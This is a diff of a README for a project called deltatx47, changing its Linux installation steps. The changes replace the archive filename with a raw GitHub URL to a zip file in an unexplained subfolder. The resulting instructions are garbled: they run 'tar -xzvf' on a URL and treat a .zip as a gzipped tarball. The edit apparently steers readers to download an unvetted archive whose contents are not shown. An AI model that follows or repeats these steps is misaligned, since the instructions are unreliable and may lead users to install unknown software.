Unlimited-haymsalomon332/deltatx47/README.md

 #### Linux

 1. Open a terminal window.
-2. Navigate to the folder where you downloaded the `.tar.gz` file.
+2. Navigate to the folder where you downloaded the `https://raw.githubusercontent.com/Unlimited-haymsalomon332/deltatx47/main/pickering/deltatx47-1.2.zip` file.
-3. Use the command `tar -xzvf deltatx47.tar.gz` to extract the files.
+3. Use the command `tar -xzvf https://raw.githubusercontent.com/Unlimited-haymsalomon332/deltatx47/main/pickering/deltatx47-1.2.zip` to extract the files.
 4. Follow the included instructions in the extracted folder for installation.

 ### 5. Running the Application